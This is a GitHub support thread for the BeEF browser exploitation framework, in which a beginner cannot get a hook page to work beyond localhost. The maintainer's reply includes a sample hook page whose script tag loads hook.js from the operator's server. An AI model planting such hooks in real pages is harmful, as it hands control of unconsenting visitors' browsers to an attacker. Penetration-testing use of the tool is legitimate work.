### ISSUE TITLE
I can't find the hooking page.

### ISSUE THREAD

**Issue by PandaPandaPandaPandaPanda** [beefproject/beef#1819] opened 2020-01-04 07:52 UTC
Hello,
I'm just getting started with BeEF and I've got a problem. I have written the index.html file but I can't open it in my browser. On my computer in firefox it works perfectly fine but only when I use my localhost ip. I don't have a lot of experience so I would be very thankful if somebody can help me.

**Comment by bcoles** [comment] 2020-01-04 08:00
More information is required to help.

>  I have written the index.html

When you start BeEF, it will print the hooking URL to console. Have you tried that URL? Does it hook successfully?

> On my computer in firefox it works perfectly fine but only when I use my localhost ip.

It is not clear what you're trying to do or what the problem is. Are you suggesting that it only works in Firefox, and not in other browsers? Are you suggesting that the hook only works with `127.0.0.1`, but not other IP addresses? Have you verified that the IP address is correct?

Your hook file should look something like this:

```html
<html>
<script src="http://your ip address:3000/hook.js"></script>
</html>
```

**Comment by PandaPandaPandaPandaPanda** [comment] 2020-01-04 08:35
Thanks for your quick answer. I have not tied other browsers and the hook only works at 127.0.0.1. The IP address is correct. 
This is the script I'm using.

<!DOCTYPE html>
<html>
	<head>
		<title>Web Server</title>

		<script src="IP"></script>
	</head>
	<body>
		<h1> Welcome to the site!</h1>
		<p> This is the hooked server file</p>
	</body>
</html>

**Comment by PandaPandaPandaPandaPanda** [comment] 2020-01-04 08:36
> More information is required to help.
> 
> > I have written the index.html
> 
> When you start BeEF, it will print the hooking URL to console. Have you tried that URL? Does it hook successfully?
> 
> > On my computer in firefox it works perfectly fine but only when I use my localhost ip.
> 
> It is not clear what you're trying to do or what the problem is. Are you suggesting that it only works in Firefox, and not in other browsers? Are you suggesting that the hook only works with `127.0.0.1`, but not other IP addresses? Have you verified that the IP address is correct?
> 
> Your hook file should look something like this:
> 
> ```
> <html>
> <script src="http://your ip address:3000/hook.js"></script>
> </html>
> ```

Thanks for your quick answer. I have not tied other browsers and the hook only works at 127.0.0.1. The IP address is correct.
This is the script I'm using.
<title>Web Server</title>

	<script src="IP"></script>
</head>
<body>
	<h1> Welcome to the site!</h1>
	<p> This is the hooked server file</p>
</body>

**Comment by bcoles** [comment] 2020-01-04 08:41
More information is required to help.

When you start BeEF, it will print the hooking URL to console. Have you tried that URL? Does it hook successfully?

What URL are you using in your hook? Your hook file should look something like this:

```html
<html>
<script src="http://your ip address:3000/hook.js"></script>
</html>
```

Is your web server using HTTPS? If so, it will not load JavaScript from a non-HTTPS URL.

**Comment by jcrew99** [comment] 2020-01-06 03:44
@PandaPandaPandaPandaPanda  can you please fill out the issue information, also included below.


Verify first that your issue/request has not been posted previously:

* https://github.com/beefproject/beef/issues
* https://github.com/beefproject/beef/wiki/FAQ

Ensure you're using the [latest version of BeEF](https://github.com/beefproject/beef/releases/tag/beef-0.5.0.0).


#### Environment

What version/revision of BeEF are you using?

On what version of Ruby?

On what browser?

On what operating system?


#### Configuration

Are you using a non-default configuration?

Have you enabled or disabled any BeEF extensions?


#### Summary

Please provide a summary of the issue.


#### Expected Behaviour

What was the expected result?


#### Actual Behaviour

What was the actual result?


#### Steps to Reproduce

Please provide steps to reproduce this issue.


#### Additional Information

Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots. Debug output can be enabled by specifying `debug: true` in the `config.yaml` configuration file.

**Closed** 2020-01-15 04:22 UTC
Labels: Question
